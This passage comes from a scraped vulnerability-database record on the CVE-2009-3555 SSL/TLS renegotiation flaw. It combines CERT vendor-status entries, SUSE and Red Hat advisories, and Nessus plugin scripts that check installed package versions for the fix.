\n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Mandriva S. A.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Microsoft Corporation\n\nNotified: November 05, 2009 Updated: June 02, 2010 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nMicrosoft has published the following advisory:\n\n<http://www.microsoft.com/technet/security/advisory/977377.mspx> \nMicrosoft has also released an update that disables TLS/SSL renegotiation. More information is available at the following Microsoft Knowledge Base Article: \n<http://support.microsoft.com/kb/977377>\n\n### __ Microsoft Internet Explorer\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Mirapoint, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ MontaVista Software, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ __ Mozilla - Network Security Services\n\nNotified: November 05, 2009 Updated: June 02, 2010 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nThe following information has been published:\n\n<https://wiki.mozilla.org/Security:Renegotiation>\n\n### __ Multitech, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ NEC Corporation\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ National Center for Supercomputing Applications\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ NetApp\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ NetBSD\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Netscape NSS\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Nokia\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Nortel Networks, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Novell, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ OpenBSD\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ OpenSSL\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Openwall GNU/*/Linux\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ PePLink\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Process Software\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Q1 Labs\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ QNX Software Systems Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Quagga\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ RadWare, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Red Hat, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ SUSE Linux\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Secureworx, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Silicon Graphics, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Slackware Linux Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ SmoothWall\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Snort\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Soapstone Networks\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Sony Corporation\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Sourcefire\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Spyrus\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Stonesoft\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Stunnel\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Symantec\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ The SCO Group\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ TippingPoint Technologies Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Turbolinux\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Ubuntu\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Unisys\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ VMware\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Vyatta\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Watchguard Technologies, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ Wind River Systems, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ ZyXEL\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ eSoft, Inc.\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ m0n0wall\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ mod_ssl\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\n### __ netfilter\n\nNotified: November 05, 2009 Updated: November 05, 2009 \n\n### Status\n\n__ Unknown\n\n### Vendor Statement\n\nNo statement is currently available from the vendor regarding this vulnerability.\n\n### Vendor Information\n\nWe are not aware of further vendor information regarding this vulnerability.\n\nView all 111 vendors __View less vendors __\n\n \n\n\n### CVSS Metrics \n\nGroup | Score | Vector \n---|---|--- \nBase | N/A | N/A \nTemporal | N/A | N/A \nEnvironmental | | N/A \n \n \n\n\n### References \n\n * <http://extendedsubset.com/?p=8>\n * <http://www.links.org/?p=780>\n * <http://www.links.org/?p=786>\n * <http://www.links.org/?p=789>\n * <http://blogs.iss.net/archive/sslmitmiscsrf.html>\n * <http://www.ietf.org/mail-archive/web/tls/current/msg03948.html>\n * <https://bugzilla.redhat.com/show_bug.cgi?id=533125>\n * <http://lists.gnu.org/archive/html/gnutls-devel/2009-11/msg00014.html>\n * <http://cvs.openssl.org/chngview?cn=18790>\n * <http://www.links.org/files/no-renegotiation-2.patch>\n * <http://blog.zoller.lu/2009/11/new-sslv3-tls-vulnerability-mitm.html>\n * <https://svn.resiprocate.org/rep/ietf-drafts/ekr/draft-rescorla-tls-renegotiate.txt>\n * <http://www.educatedguesswork.org/2009/11/understanding_the_tls_renegoti.html>\n\n### Acknowledgements\n\nThanks to Marsh Ray of PhoneFactor for reporting this vulnerability. This issue was also independently discovered and publicly disclosed by Martin Rex of SAP.\n\nThis document was written by Chris Taschner.\n\n### Other Information\n\n**CVE IDs:** | [CVE-2009-3555](<http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3555>) \n---|--- \n**Date Public:** | 2009-11-05 \n**Date First Published:** | 2009-11-11 \n**Date Last Updated: ** | 2011-07-22 12:47 UTC \n**Document Revision: ** | 35 \n", "modified": "2011-07-22T12:47:00", "published": "2009-11-11T00:00:00", "id": "VU:120541", "href": "https://www.kb.cert.org/vuls/id/120541", "type": "cert", "title": "SSL and TLS protocols renegotiation vulnerability", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T12:25:49", "bulletinFamily": "unix", "description": "The TLS/SSLv3 protocol as implemented in openssl prior to this update was not able to associate already sent data to a renegotiated connection. This allowed man-in-the-middle attackers to inject HTTP requests in a HTTPS session without being noticed. For example Apache's mod_ssl was vulnerable to this kind of attack because it uses openssl. It is believed that this vulnerability is actively exploited in the wild to get access to HTTPS protected web-sites. Please note that renegotiation will be disabled for any application using openssl by this update and may cause problems in some cases. Additionally this attack is not limited to HTTP.\n#### Solution\nThere is no work-around known. Please install the update. Moblin packages will be released later.", "modified": "2009-11-18T09:50:39", "published": "2009-11-18T09:50:39", "id": "SUSE-SA:2009:057", "href": "http://lists.opensuse.org/opensuse-security-announce/2009-11/msg00009.html", "type": "suse", "title": "man-in-the-middle attack in openssl", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2019-08-13T18:45:36", "bulletinFamily": "unix", "description": "Network Security Services (NSS) is a set of libraries designed to support\nthe cross-platform development of security-enabled client and server\napplications. Applications built with NSS can support SSLv2, SSLv3, TLS,\nand other security standards.\n\nNetscape Portable Runtime (NSPR) provides platform independence for non-GUI\noperating system facilities. These facilities include threads, thread\nsynchronization, normal file and network I/O, interval timing, calendar\ntime, basic memory management (malloc and free), and shared library\nlinking.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nUsers of Red Hat Certificate System 7.3 and 8.0 should review the following\nKnowledgebase article before installing this update:\nhttp://kbase.redhat.com/faq/docs/DOC-28439\n\nAll users of NSS are advised to upgrade to these updated packages, which\nupdate NSS to version 3.12.6. This erratum also updates the NSPR packages\nto the version required by NSS 3.12.6. All running applications using the\nNSS library must be restarted for this update to take effect.", "modified": "2017-09-08T12:08:02", "published": "2010-03-25T04:00:00", "id": "RHSA-2010:0165", "href": "https://access.redhat.com/errata/RHSA-2010:0165", "type": "redhat", "title": "(RHSA-2010:0165) Moderate: nss security update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:24", "bulletinFamily": "unix", "description": "OpenSSL is a toolkit that implements the Secure Sockets Layer (SSL v2/v3)\nand Transport Layer Security (TLS v1) protocols, as well as a\nfull-strength, general purpose cryptography library.\n\nA flaw was found in the way the TLS/SSL (Transport Layer Security/Secure\nSockets Layer) protocols handled session renegotiation. A man-in-the-middle\nattacker could use this flaw to prefix arbitrary plain text to a client's\nsession (for example, an HTTPS connection to a website). This could force\nthe server to process an attacker's request as if authenticated using the\nvictim's credentials. This update addresses this flaw by implementing the\nTLS Renegotiation Indication Extension, as defined in RFC 5746.\n(CVE-2009-3555)\n\nRefer to the following Knowledgebase article for additional details about\nthis flaw: http://kbase.redhat.com/faq/docs/DOC-20491\n\nAll openssl097a users should upgrade to these updated packages, which\ncontain a backported patch to resolve this issue. For the update to take\neffect, all services linked to the openssl097a library must be restarted,\nor the system rebooted.", "modified": "2017-09-08T12:19:40", "published": "2010-03-25T04:00:00", "id": "RHSA-2010:0164", "href": "https://access.redhat.com/errata/RHSA-2010:0164", "type": "redhat", "title": "(RHSA-2010:0164) Moderate: openssl097a security update", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}], "nessus": [{"lastseen": "2020-02-01T02:14:27", "bulletinFamily": "scanner", "description": "The SSL-renegotiation ", "modified": "2020-02-02T00:00:00", "id": "SUSE_11_GNUTLS-101206.NASL", "href": "https://www.tenable.com/plugins/nessus/51198", "published": "2010-12-16T00:00:00", "title": "SuSE 11 / 11.1 Security Update : GnuTLS (SAT Patch Numbers 3650 / 3651)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51198);\n script_version(\"1.11\");\n script_cvs_date(\"Date: 2019/10/25 13:36:39\");\n\n script_cve_id(\"CVE-2009-3555\");\n\n script_name(english:\"SuSE 11 / 11.1 Security Update : GnuTLS (SAT Patch Numbers 3650 / 3651)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The SSL-renegotiation 'authentication gap' has been fixed in GnuTLS.\nCVE-2009-3555 has been assigned to this issue.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=554084\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-3555.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Apply SAT patch number 3650 / 3651 as appropriate.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:gnutls\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libgnutls26\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libgnutls26-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2010/12/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2010/12/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2010-2019 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"gnutls-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"libgnutls26-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"gnutls-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libgnutls26-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"gnutls-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"i586\", reference:\"libgnutls26-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"gnutls-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libgnutls26-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:1, cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"gnutls-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"libgnutls26-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"s390x\", reference:\"libgnutls26-32bit-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"gnutls-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, reference:\"libgnutls26-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"s390x\", reference:\"libgnutls26-32bit-2.4.1-24.32.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:1, cpu:\"x86_64\", reference:\"libgnutls26-32bit-2.4.1-24.32.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:P"}}, {"lastseen": "2020-02-01T07:09:02", "bulletinFamily": "scanner", "description": "Update to 1.1.18, implementing a mitigation for CVE-2009-3555.\nhttp://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\nhttp://marc.info/?l=tomcat-dev&m=125900987921402&w=2\nhttp://marc.info/?l =tomcat-dev&m=125874793414940&w=2\nhttp://marc.info/?l=tomcat- user&m=125874793614950&w=2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "modified": "2020-02-02T00:00:00", "id": "FEDORA_2009-12229.NASL", "href": "https://www.tenable.com/plugins/nessus/43327", "published": "2009-12-18T00:00:00", "title": "Fedora 12 : tomcat-native-1.1.18-1.fc12 (2009-12229)", "type": "nessus", "sourceData": "#%NASL_MIN_LEVEL 80502\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2009-12229.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(43327);\n script_version(\"1.18\");\n script_cvs_date(\"Date: 2019/08/02 13:32:29\");\n\n script_cve_id(\"CVE-2009-3555\");\n script_bugtraq_id(36935);\n script_xref(name:\"FEDORA\", value:\"2009-12229\");\n\n script_name(english:\"Fedora 12 : tomcat-native-1.1.18-1.fc12 (2009-12229)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to 1.1.18, implementing a mitigation for CVE-2009-3555.\nhttp://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\nhttp://marc.info/?l=tomcat-dev&m=125900987921402&w=2\nhttp://marc.info/?l =tomcat-dev&m=125874793414940&w=2\nhttp://marc.info/?l=tomcat- user&m=125874793614950&w=2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # http://marc.info/?l\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l\"\n );\n # http://marc.info/?l=tomcat-\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=tomcat-\"\n );\n # http://marc.info/?l=tomcat-dev&m=125900987921402&w=2\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://marc.info/?l=tomcat-dev&m=125900987921402&w=2\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://tomcat.apache.org/native-doc/miscellaneous/changelog-1.1.x.html\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2009-December/032838.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?eb03b77e\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected tomcat-native package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:N/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_cwe_id(310);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:tomcat-native\");\n 